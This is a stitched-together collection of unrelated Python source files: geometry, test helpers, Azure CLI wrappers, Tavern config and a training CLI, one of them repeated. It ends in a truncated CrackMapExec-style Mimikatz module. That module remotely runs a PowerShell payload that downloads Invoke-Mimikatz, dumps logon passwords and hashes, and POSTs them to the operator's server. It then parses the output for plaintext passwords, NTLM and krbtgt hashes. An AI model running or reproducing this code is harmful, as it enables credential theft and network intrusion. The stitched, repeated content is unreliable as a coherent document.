__init__ = _vroom.Location.__init__
def __new__(
cls,
*args,
**kwargs,
):
if cls is Location and len(args) + len(kwargs) == 1:
# extract args from Location{,Index,Coordinates}
if args and isinstance(args[0], _vroom.Location):
args, [loc] = (), args
if loc._user_index():
args += (loc._index(),)
if loc._has_coordinates():
args += ([loc._lon(), loc._lat()],)
# single positional int -> LocationIndex
if "index" in kwargs or args and isinstance(args[0], int):
instance = _vroom.Location.__new__(LocationIndex, *args, **kwargs)
instance.__init__(*args, **kwargs)
return instance
# single positional sequence -> LocationCoordinates
elif "coords" in kwargs or args and isinstance(args[0], Sequence) and len(args[0]) == 2:
instance = _vroom.Location.__new__(LocationCoordinates, *args, **kwargs)
instance.__init__(*args, **kwargs)
return instance
return _vroom.Location.__new__(cls, *args, **kwargs)
def __repr__(self) -> str:
args = f"index={self.index}, coords={self.coords}"
return f"vroom.{self.__class__.__name__}({args})"
|
src/vroom/location.py
| 0.968186 | 0.662455 |
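Location.__new__ above routes a single constructor call to a subclass based on the argument's type. A minimal standalone sketch of that dispatch idea, with illustrative class names and no _vroom dependency:
from collections.abc import Sequence
class Loc:
    def __new__(cls, value):
        # Route plain ints to LocIndex and two-element sequences to LocCoords.
        if cls is Loc:
            if isinstance(value, int):
                return super().__new__(LocIndex)
            if isinstance(value, Sequence) and len(value) == 2:
                return super().__new__(LocCoords)
        return super().__new__(cls)
    def __init__(self, value):
        self.value = value
class LocIndex(Loc):
    pass
class LocCoords(Loc):
    pass
print(type(Loc(4)).__name__)           # LocIndex
print(type(Loc((7.0, 8.0))).__name__)  # LocCoords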
import os
import warnings
from RLTest import Env
class FlowTestsBase(object):
def __init__(self):
self.env = Env()
redis_con = self.env.getConnection()
redis_con.execute_command("FLUSHALL")
def _assert_equalish(self, a, b, e=0.05):
delta = a * e
diff = abs(a-b)
if diff > delta:
            warnings.warn('runtimes differ by more than %.1f%%' % (e * 100))
def _assert_only_expected_results_are_in_actual_results(self,
actual_result,
query_info):
actual_result_set = []
if actual_result.result_set is not None:
actual_result_set = actual_result.result_set
# Assert number of results.
self.env.assertEqual(len(actual_result_set), len(query_info.expected_result))
# Assert actual values vs expected values.
for res in query_info.expected_result:
self.env.assertIn(res, actual_result_set)
def _assert_actual_results_contained_in_expected_results(self,
actual_result,
query_info,
num_contained_results):
actual_result_set = actual_result.result_set
# Assert num results.
self.env.assertEqual(len(actual_result_set), num_contained_results)
# Assert actual values vs expected values.
expected_result = query_info.expected_result
count = len([res for res in expected_result if res in actual_result_set])
# Assert number of different results is as expected.
self.env.assertEqual(count, num_contained_results)
def _assert_run_time(self, actual_result, query_info):
if actual_result.run_time_ms > query_info.max_run_time_ms:
warnings.warn('Maximum runtime for query \"%s\" was: %s, but should be %s' %
(query_info.description, str(actual_result.run_time_ms), str(query_info.max_run_time_ms)))
|
tests/flow/base.py
| 0.54698 | 0.336713 |
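_assert_equalish above treats two runtimes as close when their difference is below a fraction e of the first value. The standard library's math.isclose captures the same idea, though with a symmetric relative tolerance (scaled by the larger magnitude rather than by a); a quick sketch:
import math
def equalish(a, b, e=0.05):
    return math.isclose(a, b, rel_tol=e)
assert equalish(100.0, 104.0)        # within 5%
assert not equalish(100.0, 110.0)    # differs by 10%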
from __future__ import annotations
from aioresponses import aioresponses
from bold_smart_lock.auth import Auth
from bold_smart_lock.const import API_URI, AUTHENTICATIONS_ENDPOINT, POST_HEADERS, VALIDATIONS_ENDPOINT
import aiohttp
import json
import os
def load_fixture(filename: str, raw: bool = False):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path) as fdp:
return fdp.read() if raw else json.loads(fdp.read())
fixture_authenticate_request: dict[str, str] = load_fixture("authenticate_request.json")
fixture_request_validation_id_response: dict[str, str] = load_fixture("request_validation_id_response.json")
fixture_verify_validation_id_response: dict[str, str] = load_fixture("verify_validation_id_response.json")
fixture_authenticate_response: dict[str, str] = load_fixture("authenticate_response.json")
async def mock_auth_authenticate(
mock_request_validation_id_response: list = None,
mock_fixture_verify_validation_id_response: list = None,
mock_authenticate_reponse: list = None,
mock_auth: Auth = None,
mock_session: aiohttp.ClientSession = None
) -> dict[str, str]:
"""Helper to set mocking for request+verify validation id and authenticate calls"""
with aioresponses() as m:
if mock_request_validation_id_response:
m.post(
API_URI + VALIDATIONS_ENDPOINT,
headers=POST_HEADERS,
status=mock_request_validation_id_response[0] or 200,
payload=mock_request_validation_id_response[1] or fixture_request_validation_id_response,
)
if mock_fixture_verify_validation_id_response:
m.post(
API_URI + VALIDATIONS_ENDPOINT + "/" + fixture_request_validation_id_response["id"],
headers=POST_HEADERS,
status=mock_fixture_verify_validation_id_response[0] or 200,
payload=mock_fixture_verify_validation_id_response[1] or fixture_verify_validation_id_response,
)
if mock_authenticate_reponse:
m.post(
API_URI + AUTHENTICATIONS_ENDPOINT,
headers=POST_HEADERS,
status=mock_authenticate_reponse[0] or 200,
payload=mock_authenticate_reponse[1] or fixture_authenticate_response,
)
try:
session = mock_session or aiohttp.ClientSession()
auth = mock_auth or Auth(session)
return await auth.authenticate(
fixture_authenticate_request["email"],
fixture_authenticate_request["password"],
fixture_authenticate_request["validation_code"],
fixture_authenticate_request["validation_id"]
)
except Exception as exception:
raise exception
finally:
await session.close()
async def mock_auth_request_validation_id(
status: int = 200,
verification_method: str = "email",
headers: str = "application/json",
response: dict[str, str] = fixture_request_validation_id_response,
) -> dict[str, str]:
"""Helper to set mocking for request_validation_id calls"""
with aioresponses() as m:
m.post(
API_URI + VALIDATIONS_ENDPOINT,
headers=headers or POST_HEADERS,
status=status,
payload=response,
)
try:
session = aiohttp.ClientSession()
auth = Auth(session)
return await auth.request_validation_id(
fixture_authenticate_request["email"] if verification_method == "email" else fixture_authenticate_request["phone"],
)
except Exception as exception:
raise exception
finally:
await session.close()
|
tests/helpers.py
| 0.61115 | 0.102709 |
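The helpers above register canned responses with aioresponses and then drive the real client code through aiohttp. A minimal self-contained version of that mock-then-call pattern (the URL is a placeholder, not part of the Bold API):
import asyncio
import aiohttp
from aioresponses import aioresponses
async def fetch_health():
    with aioresponses() as m:
        m.get("https://api.example.test/health", status=200, payload={"ok": True})
        async with aiohttp.ClientSession() as session:
            async with session.get("https://api.example.test/health") as resp:
                return await resp.json()
print(asyncio.run(fetch_health()))  # {'ok': True}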
import json, subprocess
from ... pyaz_utils import get_cli_name, get_params
def show(resource_group, profile_name, endpoint_name):
params = get_params(locals())
command = "az afd endpoint show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def list(resource_group, profile_name):
params = get_params(locals())
command = "az afd endpoint list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def purge(resource_group, profile_name, endpoint_name, content_paths, domains=None, no_wait=None):
params = get_params(locals())
command = "az afd endpoint purge " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def delete(resource_group, profile_name, endpoint_name, yes=None):
params = get_params(locals())
command = "az afd endpoint delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def update(resource_group, profile_name, endpoint_name, origin_response_timeout_seconds=None, enabled_state=None, tags=None):
params = get_params(locals())
command = "az afd endpoint update " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def create(resource_group, profile_name, endpoint_name, origin_response_timeout_seconds, enabled_state, tags=None):
params = get_params(locals())
command = "az afd endpoint create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
|
test/pyaz/afd/endpoint/__init__.py
| 0.209712 | 0.062245 |
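Each wrapper above repeats the same run-print-parse block. One way to factor that out is sketched below; note it keys off the exit code, whereas the wrappers above key off whether stdout is empty, so it is a variant rather than a drop-in replacement:
import json
import subprocess
def run_json_command(command: str):
    """Run a shell command and return its stdout parsed as JSON (None if empty)."""
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    if result.returncode != 0:
        raise RuntimeError(result.stderr.strip())
    return json.loads(result.stdout) if result.stdout.strip() else None
# e.g. run_json_command("az afd endpoint list " + params), assuming the az CLI is installed.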
from attr import attrib, NOTHING
from related import _init_fields, types
from collections import OrderedDict
from .converters import to_sequence_field_w_str, to_leaf_mapping_field, to_eval_str, identity
from . import dispatchers # to load the dispatcher
class UNSPECIFIED(object):
pass
def AnyField(default=NOTHING, required=True, repr=True):
"""
Just pass through the field, using default yaml conversion to python objects
:param cls: class (or name) of the model to be related in Sequence.
:param default: any TypedSequence or list
:param bool required: whether or not the object is invalid if not provided.
:param bool repr: include this field should appear in object's repr.
:param bool cmp: include this field in generated comparison.
"""
default = _init_fields.init_default(required, default, UNSPECIFIED())
return attrib(default=default, converter=None, validator=None,
repr=repr)
def StrSequenceField(cls, default=NOTHING, required=True, repr=True):
"""
Create new sequence field on a model. If only string is present,
convert it to a list of length 1.
:param cls: class (or name) of the model to be related in Sequence.
:param default: any TypedSequence or list
:param bool required: whether or not the object is invalid if not provided.
:param bool repr: include this field should appear in object's repr.
:param bool cmp: include this field in generated comparison.
"""
default = _init_fields.init_default(required, default, [])
# check that it's not sequence
converter = to_sequence_field_w_str(cls)
validator = _init_fields.init_validator(required, types.TypedSequence)
# kw convert is deprecated
try:
return attrib(default=default, converter=converter, validator=validator,
repr=repr)
except TypeError:
return attrib(default=default, convert=converter, validator=validator,
repr=repr)
def NestedMappingField(cls, keyword, key, default=NOTHING, required=True, repr=False):
"""
    Create a new nested mapping field on a model. Nested mappings are recursed
    until `keyword` indicates that `cls` has been found; the resulting children
    are keyed by their `key` field.
:param cls: class (or name) of the model to be related in Sequence.
:param keyword: stopping condition in recursion (indicator that cls has been found)
:param key: key field on the child object to be used as the mapping key.
:param default: any TypedSequence or list
:param bool required: whether or not the object is invalid if not provided.
:param bool repr: include this field should appear in object's repr.
:param bool cmp: include this field in generated comparison.
"""
default = _init_fields.init_default(required, default, OrderedDict())
# check that it's not sequence
converter = to_leaf_mapping_field(cls, keyword, key)
# validator = _init_fields.init_validator(required, types.TypedSequence)
validator = None
return attrib(default=default, converter=converter, validator=validator,
repr=repr)
def TupleIntField(default=NOTHING, required=True, repr=True):
"""
Create new tuple field on a model. Convert it first to a string
and then to a tuple
:param cls: class (or name) of the model to be related in Sequence.
:param default: any TypedSequence or list
:param bool required: whether or not the object is invalid if not provided.
:param bool repr: include this field should appear in object's repr.
:param bool cmp: include this field in generated comparison.
"""
default = _init_fields.init_default(required, default, tuple)
converter = to_eval_str
validator = _init_fields.init_validator(required, tuple)
return attrib(default=default, converter=converter, validator=validator,
repr=repr)
|
kipoi_utils/external/related/fields.py
| 0.777807 | 0.264563 |
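The factories above ultimately reduce to attr.attrib calls wired up with a converter and validator. A standalone sketch of the converter idea behind StrSequenceField (string-or-list coercion), using plain attrs with no related dependency:
import attr
def to_str_list(value):
    # Accept a bare string as a one-element list; otherwise coerce to list.
    return [value] if isinstance(value, str) else list(value)
@attr.s
class Example:
    names = attr.ib(default=attr.Factory(list), converter=to_str_list)
print(Example(names="single").names)    # ['single']
print(Example(names=["a", "b"]).names)  # ['a', 'b']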
from functools import lru_cache
import logging
import os
from box import Box
from tavern.util.dict_util import format_keys
from tavern.util.general import load_global_config
from tavern.util.strict_util import StrictLevel
logger = logging.getLogger(__name__)
def add_parser_options(parser_addoption, with_defaults=True):
"""Add argparse options
This is shared between the CLI and pytest (for now)
See also testutils.pytesthook.hooks.pytest_addoption
"""
parser_addoption(
"--tavern-global-cfg",
help="One or more global configuration files to include in every test",
nargs="+",
)
parser_addoption(
"--tavern-http-backend",
help="Which http backend to use",
default="requests" if with_defaults else None,
)
parser_addoption(
"--tavern-mqtt-backend",
help="Which mqtt backend to use",
default="paho-mqtt" if with_defaults else None,
)
parser_addoption(
"--tavern-strict",
help="Default response matching strictness",
default=None,
nargs="+",
choices=["json", "headers", "redirect_query_params"],
)
parser_addoption(
"--tavern-use-default-traceback",
help="Use normal python-style traceback",
default=False,
action="store_true",
)
parser_addoption(
"--tavern-always-follow-redirects",
help="Always follow HTTP redirects",
default=False,
action="store_true",
)
parser_addoption(
"--tavern-file-path-regex",
help="Regex to search for Tavern YAML test files",
default=r".+\.tavern\.ya?ml$",
action="store",
nargs=1,
)
parser_addoption(
"--tavern-merge-ext-function-values",
help="Merge values from external functions in http requests",
default=False,
action="store_true",
)
def add_ini_options(parser):
"""Add an option to pass in a global config file for tavern
See also testutils.pytesthook.util.add_parser_options
"""
parser.addini(
"tavern-global-cfg",
help="One or more global configuration files to include in every test",
type="linelist",
default=[],
)
parser.addini(
"tavern-http-backend", help="Which http backend to use", default="requests"
)
parser.addini(
"tavern-mqtt-backend", help="Which mqtt backend to use", default="paho-mqtt"
)
parser.addini(
"tavern-strict",
help="Default response matching strictness",
type="args",
default=None,
)
parser.addini(
"tavern-use-default-traceback",
help="Use normal python-style traceback",
type="bool",
default=False,
)
parser.addini(
"tavern-always-follow-redirects",
help="Always follow HTTP redirects",
type="bool",
default=False,
)
parser.addini(
"tavern-file-path-regex",
help="Regex to search for Tavern YAML test files",
default=r".+\.tavern\.ya?ml$",
type="args",
)
parser.addini(
"tavern-merge-ext-function-values",
help="Merge values from external functions in http requests",
default=False,
type="bool",
)
@lru_cache()
def load_global_cfg(pytest_config):
"""Load globally included config files from cmdline/cfg file arguments
Args:
pytest_config (pytest.Config): Pytest config object
Returns:
dict: variables/stages/etc from global config files
Raises:
exceptions.UnexpectedKeysError: Invalid settings in one or more config
files detected
"""
# Load ini first
ini_global_cfg_paths = pytest_config.getini("tavern-global-cfg") or []
# THEN load command line, to allow overwriting of values
cmdline_global_cfg_paths = pytest_config.getoption("tavern_global_cfg") or []
all_paths = ini_global_cfg_paths + cmdline_global_cfg_paths
global_cfg = load_global_config(all_paths)
try:
loaded_variables = global_cfg["variables"]
except KeyError:
logger.debug("Nothing to format in global config files")
else:
tavern_box = Box({"tavern": {"env_vars": dict(os.environ)}})
global_cfg["variables"] = format_keys(loaded_variables, tavern_box)
# Can be overridden in tests
global_cfg["strict"] = _load_global_strictness(pytest_config)
global_cfg["follow_redirects"] = _load_global_follow_redirects(pytest_config)
global_cfg["backends"] = _load_global_backends(pytest_config)
global_cfg["merge_ext_values"] = _load_global_merge_ext(pytest_config)
logger.debug("Global config: %s", global_cfg)
return global_cfg
def _load_global_backends(pytest_config):
"""Load which backend should be used"""
backend_settings = {}
backends = ["http", "mqtt"]
for b in backends:
backend_settings[b] = get_option_generic(
pytest_config, "tavern-{}-backend".format(b), None
)
return backend_settings
def _load_global_strictness(pytest_config):
"""Load the global 'strictness' setting"""
options = get_option_generic(pytest_config, "tavern-strict", [])
return StrictLevel.from_options(options)
def _load_global_follow_redirects(pytest_config):
"""Load the global 'follow redirects' setting"""
return get_option_generic(pytest_config, "tavern-always-follow-redirects", False)
def _load_global_merge_ext(pytest_config):
"""Load the global setting about whether external values should be merged or not"""
return get_option_generic(pytest_config, "tavern-merge-ext-function-values", True)
def get_option_generic(pytest_config, flag, default):
"""Get a configuration option or return the default
Priority order is cmdline, then ini, then default"""
cli_flag = flag.replace("-", "_")
ini_flag = flag
# Lowest priority
use = default
# Middle priority
if pytest_config.getini(ini_flag) is not None:
use = pytest_config.getini(ini_flag)
# Top priority
if pytest_config.getoption(cli_flag) is not None:
use = pytest_config.getoption(cli_flag)
return use
|
tavern/testutils/pytesthook/util.py
|
from functools import lru_cache
import logging
import os
from box import Box
from tavern.util.dict_util import format_keys
from tavern.util.general import load_global_config
from tavern.util.strict_util import StrictLevel
logger = logging.getLogger(__name__)
def add_parser_options(parser_addoption, with_defaults=True):
"""Add argparse options
This is shared between the CLI and pytest (for now)
See also testutils.pytesthook.hooks.pytest_addoption
"""
parser_addoption(
"--tavern-global-cfg",
help="One or more global configuration files to include in every test",
nargs="+",
)
parser_addoption(
"--tavern-http-backend",
help="Which http backend to use",
default="requests" if with_defaults else None,
)
parser_addoption(
"--tavern-mqtt-backend",
help="Which mqtt backend to use",
default="paho-mqtt" if with_defaults else None,
)
parser_addoption(
"--tavern-strict",
help="Default response matching strictness",
default=None,
nargs="+",
choices=["json", "headers", "redirect_query_params"],
)
parser_addoption(
"--tavern-use-default-traceback",
help="Use normal python-style traceback",
default=False,
action="store_true",
)
parser_addoption(
"--tavern-always-follow-redirects",
help="Always follow HTTP redirects",
default=False,
action="store_true",
)
parser_addoption(
"--tavern-file-path-regex",
help="Regex to search for Tavern YAML test files",
default=r".+\.tavern\.ya?ml$",
action="store",
nargs=1,
)
parser_addoption(
"--tavern-merge-ext-function-values",
help="Merge values from external functions in http requests",
default=False,
action="store_true",
)
def add_ini_options(parser):
"""Add an option to pass in a global config file for tavern
See also testutils.pytesthook.util.add_parser_options
"""
parser.addini(
"tavern-global-cfg",
help="One or more global configuration files to include in every test",
type="linelist",
default=[],
)
parser.addini(
"tavern-http-backend", help="Which http backend to use", default="requests"
)
parser.addini(
"tavern-mqtt-backend", help="Which mqtt backend to use", default="paho-mqtt"
)
parser.addini(
"tavern-strict",
help="Default response matching strictness",
type="args",
default=None,
)
parser.addini(
"tavern-use-default-traceback",
help="Use normal python-style traceback",
type="bool",
default=False,
)
parser.addini(
"tavern-always-follow-redirects",
help="Always follow HTTP redirects",
type="bool",
default=False,
)
parser.addini(
"tavern-file-path-regex",
help="Regex to search for Tavern YAML test files",
default=r".+\.tavern\.ya?ml$",
type="args",
)
parser.addini(
"tavern-merge-ext-function-values",
help="Merge values from external functions in http requests",
default=False,
type="bool",
)
@lru_cache()
def load_global_cfg(pytest_config):
"""Load globally included config files from cmdline/cfg file arguments
Args:
pytest_config (pytest.Config): Pytest config object
Returns:
dict: variables/stages/etc from global config files
Raises:
exceptions.UnexpectedKeysError: Invalid settings in one or more config
files detected
"""
# Load ini first
ini_global_cfg_paths = pytest_config.getini("tavern-global-cfg") or []
# THEN load command line, to allow overwriting of values
cmdline_global_cfg_paths = pytest_config.getoption("tavern_global_cfg") or []
all_paths = ini_global_cfg_paths + cmdline_global_cfg_paths
global_cfg = load_global_config(all_paths)
try:
loaded_variables = global_cfg["variables"]
except KeyError:
logger.debug("Nothing to format in global config files")
else:
tavern_box = Box({"tavern": {"env_vars": dict(os.environ)}})
global_cfg["variables"] = format_keys(loaded_variables, tavern_box)
# Can be overridden in tests
global_cfg["strict"] = _load_global_strictness(pytest_config)
global_cfg["follow_redirects"] = _load_global_follow_redirects(pytest_config)
global_cfg["backends"] = _load_global_backends(pytest_config)
global_cfg["merge_ext_values"] = _load_global_merge_ext(pytest_config)
logger.debug("Global config: %s", global_cfg)
return global_cfg
def _load_global_backends(pytest_config):
"""Load which backend should be used"""
backend_settings = {}
backends = ["http", "mqtt"]
for b in backends:
backend_settings[b] = get_option_generic(
pytest_config, "tavern-{}-backend".format(b), None
)
return backend_settings
def _load_global_strictness(pytest_config):
"""Load the global 'strictness' setting"""
options = get_option_generic(pytest_config, "tavern-strict", [])
return StrictLevel.from_options(options)
def _load_global_follow_redirects(pytest_config):
"""Load the global 'follow redirects' setting"""
return get_option_generic(pytest_config, "tavern-always-follow-redirects", False)
def _load_global_merge_ext(pytest_config):
"""Load the global setting about whether external values should be merged or not"""
return get_option_generic(pytest_config, "tavern-merge-ext-function-values", True)
def get_option_generic(pytest_config, flag, default):
"""Get a configuration option or return the default
Priority order is cmdline, then ini, then default"""
cli_flag = flag.replace("-", "_")
ini_flag = flag
# Lowest priority
use = default
# Middle priority
if pytest_config.getini(ini_flag) is not None:
use = pytest_config.getini(ini_flag)
# Top priority
if pytest_config.getoption(cli_flag) is not None:
use = pytest_config.getoption(cli_flag)
return use
| 0.585812 | 0.171651 |
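A minimal sketch of the cmdline-over-ini-over-default resolution that get_option_generic in the tavern pytesthook util above implements. FakeConfig is a hypothetical stand-in for pytest.Config that only emulates getini/getoption, so this is illustrative rather than Tavern's own test code.

class FakeConfig:
    """Hypothetical stand-in for pytest.Config: just getini()/getoption()."""
    def __init__(self, ini=None, cli=None):
        self._ini, self._cli = ini or {}, cli or {}

    def getini(self, name):
        return self._ini.get(name)

    def getoption(self, name):
        return self._cli.get(name)


def resolve(config, flag, default):
    """Same priority chain as get_option_generic: cmdline > ini > default."""
    use = default
    if config.getini(flag) is not None:
        use = config.getini(flag)
    if config.getoption(flag.replace("-", "_")) is not None:
        use = config.getoption(flag.replace("-", "_"))
    return use


if __name__ == "__main__":
    cfg = FakeConfig(ini={"tavern-http-backend": "requests"},
                     cli={"tavern_http_backend": "custom"})
    assert resolve(cfg, "tavern-http-backend", None) == "custom"       # cmdline wins
    assert resolve(FakeConfig(), "tavern-http-backend", "requests") == "requests"  # default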
import argparse
from pathlib import Path
import json
import shutil
import sys
from termcolor import colored, cprint
from pprint import pprint
def command_interface(title=None):
parser = argparse.ArgumentParser(description=title)
parser.add_argument('--config', '-cf', default=None, help='training configs json file')
parser.add_argument('--devices', '-d', nargs='+', default=None, type=int, help='CUDA devices. Use CPU if None')
parser.add_argument('--rand_seed', '-r', default=1, type=int, help='random seed initialization')
parser.add_argument('--name', '-n', default='exp', help='name of this experiment')
parser.add_argument('--mode', '-m', default='new', choices=['new', 'resume', 'test', 'finetune'], help='running mode')
parser.add_argument('--iters', '-i', default=1, type=int, help='number of iterations to run the experiment')
parser.add_argument('--omniscient', '-o', action='store_true', help='if specified, set validation set = test set')
parser.add_argument('--overwrite', '-ow', action='store_true', help='if specified, overwrite existing folder without asking')
parser.add_argument('--workers', '-w', default=12, type=int, help='number of workers for the dataloader')
parser.add_argument('--amp', '-a', action='store_true', help='if specified, turn amp on')
args = parser.parse_args()
pprint(vars(args))
    with open(args.config) as config_file:
        config = json.load(config_file)
save_root = Path('weights')/args.name
if args.mode == 'new' and Path(save_root).exists():
if not args.overwrite and args.name != 'exp':
txt = input(colored(f'[WARNING] {save_root} exists. Overwrite [Y/N]? ', color='yellow', attrs=['bold']))
else:
txt = 'y'
if txt.lower() == 'y':
cprint(f'Overwrite {save_root} folder...', color='yellow', attrs=['bold'])
shutil.rmtree(save_root)
else:
cprint('Abort...', color='yellow', attrs=['bold'])
sys.exit()
return args, config, save_root
if __name__ == '__main__':
command_interface()
|
util/command_interface.py
|
import argparse
from pathlib import Path
import json
import shutil
import sys
from termcolor import colored, cprint
from pprint import pprint
def command_interface(title=None):
parser = argparse.ArgumentParser(description=title)
parser.add_argument('--config', '-cf', default=None, help='training configs json file')
parser.add_argument('--devices', '-d', nargs='+', default=None, type=int, help='CUDA devices. Use CPU if None')
parser.add_argument('--rand_seed', '-r', default=1, type=int, help='random seed initialization')
parser.add_argument('--name', '-n', default='exp', help='name of this experiment')
parser.add_argument('--mode', '-m', default='new', choices=['new', 'resume', 'test', 'finetune'], help='running mode')
parser.add_argument('--iters', '-i', default=1, type=int, help='number of iterations to run the experiment')
parser.add_argument('--omniscient', '-o', action='store_true', help='if specified, set validation set = test set')
parser.add_argument('--overwrite', '-ow', action='store_true', help='if specified, overwrite existing folder without asking')
parser.add_argument('--workers', '-w', default=12, type=int, help='number of workers for the dataloader')
parser.add_argument('--amp', '-a', action='store_true', help='if specified, turn amp on')
args = parser.parse_args()
pprint(vars(args))
    with open(args.config) as config_file:
        config = json.load(config_file)
save_root = Path('weights')/args.name
if args.mode == 'new' and Path(save_root).exists():
if not args.overwrite and args.name != 'exp':
txt = input(colored(f'[WARNING] {save_root} exists. Overwrite [Y/N]? ', color='yellow', attrs=['bold']))
else:
txt = 'y'
if txt.lower() == 'y':
cprint(f'Overwrite {save_root} folder...', color='yellow', attrs=['bold'])
shutil.rmtree(save_root)
else:
cprint('Abort...', color='yellow', attrs=['bold'])
sys.exit()
return args, config, save_root
if __name__ == '__main__':
command_interface()
| 0.269422 | 0.055311 |
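A rough usage sketch for command_interface above: write a throwaway JSON config, patch sys.argv, and call the function. It assumes the module is importable as util.command_interface (matching the repo path), and the config keys shown are placeholders rather than a documented schema.

import json
import sys
import tempfile

from util.command_interface import command_interface  # assumes the repo layout above

# Write a throwaway config file so --config has something to load.
with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as tmp:
    json.dump({"lr": 1e-3, "batch_size": 32}, tmp)  # placeholder keys
    cfg_path = tmp.name

# Simulate a command line; --overwrite avoids the interactive prompt.
sys.argv = ["train.py", "--config", cfg_path, "--name", "demo_run", "--overwrite"]
args, config, save_root = command_interface("demo experiment")
print(args.mode, config, save_root)  # new {'lr': 0.001, 'batch_size': 32} weights/demo_run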
from cme.helpers import create_ps_command, get_ps_script, obfs_ps_script, gen_random_string, validate_ntlm, write_log
from datetime import datetime
import re
class CMEModule:
'''
Executes PowerSploit's Invoke-Mimikatz.ps1 script
Module by @byt3bl33d3r
'''
name = 'mimikatz'
description = "Executes PowerSploit's Invoke-Mimikatz.ps1 script"
def options(self, context, module_options):
'''
COMMAND Mimikatz command to execute (default: 'sekurlsa::logonpasswords')
'''
self.mimikatz_command = 'privilege::debug sekurlsa::logonpasswords exit'
if module_options and 'COMMAND' in module_options:
self.mimikatz_command = module_options['COMMAND']
#context.log.debug("Mimikatz command: '{}'".format(self.mimikatz_command))
self.obfs_name = gen_random_string()
def on_admin_login(self, context, connection):
payload = '''
IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Mimikatz.ps1');
$creds = Invoke-{func_name} -Command '{command}';
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
$request.Method = 'POST';
$request.ContentType = 'application/x-www-form-urlencoded';
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();'''.format(server=context.server,
port=context.server_port,
addr=context.localip,
func_name=self.obfs_name,
command=self.mimikatz_command)
context.log.debug('Payload: {}'.format(payload))
payload = create_ps_command(payload)
connection.execute(payload)
context.log.success('Executed payload')
def on_request(self, context, request):
if 'Invoke-Mimikatz.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
else:
request.send_response(404)
request.end_headers()
def uniquify_tuples(self, tuples):
"""
uniquify mimikatz tuples based on the password
cred format- (credType, domain, username, password, hostname, sid)
Stolen from the Empire project.
"""
seen = set()
return [item for item in tuples if "{}{}{}{}".format(item[0],item[1],item[2],item[3]) not in seen and not seen.add("{}{}{}{}".format(item[0],item[1],item[2],item[3]))]
def parse_mimikatz(self, data):
"""
Parse the output from Invoke-Mimikatz to return credential sets.
This was directly stolen from the Empire project as well.
"""
# cred format:
# credType, domain, username, password, hostname, sid
creds = []
# regexes for "sekurlsa::logonpasswords" Mimikatz output
regexes = ["(?s)(?<=msv :).*?(?=tspkg :)", "(?s)(?<=tspkg :).*?(?=wdigest :)", "(?s)(?<=wdigest :).*?(?=kerberos :)", "(?s)(?<=kerberos :).*?(?=ssp :)", "(?s)(?<=ssp :).*?(?=credman :)", "(?s)(?<=credman :).*?(?=Authentication Id :)", "(?s)(?<=credman :).*?(?=mimikatz)"]
hostDomain = ""
domainSid = ""
hostName = ""
lines = data.split("\n")
for line in lines[0:2]:
if line.startswith("Hostname:"):
try:
domain = line.split(":")[1].strip()
temp = domain.split("/")[0].strip()
domainSid = domain.split("/")[1].strip()
hostName = temp.split(".")[0]
hostDomain = ".".join(temp.split(".")[1:])
except:
pass
for regex in regexes:
p = re.compile(regex)
for match in p.findall(data):
lines2 = match.split("\n")
username, domain, password = "", "", ""
for line in lines2:
try:
if "Username" in line:
username = line.split(":",1)[1].strip()
elif "Domain" in line:
domain = line.split(":",1)[1].strip()
elif "NTLM" in line or "Password" in line:
password = line.split(":",1)[1].strip()
except:
pass
if username != "" and password != "" and password != "(null)":
sid = ""
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
if validate_ntlm(password):
credType = "hash"
else:
credType = "plaintext"
# ignore machine account plaintexts
if not (credType == "plaintext" and username.endswith("$")):
creds.append((credType, domain, username, password, hostName, sid))
if len(creds) == 0:
# check if we have lsadump output to check for krbtgt
# happens on domain controller hashdumps
for x in xrange(8,13):
if lines[x].startswith("Domain :"):
domain, sid, krbtgtHash = "", "", ""
try:
domainParts = lines[x].split(":")[1]
domain = domainParts.split("/")[0].strip()
sid = domainParts.split("/")[1].strip()
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
for x in xrange(0, len(lines)):
if lines[x].startswith("User : krbtgt"):
krbtgtHash = lines[x+2].split(":")[1].strip()
break
if krbtgtHash != "":
creds.append(("hash", domain, "krbtgt", krbtgtHash, hostName, sid))
except Exception as e:
pass
if len(creds) == 0:
# check if we get lsadump::dcsync output
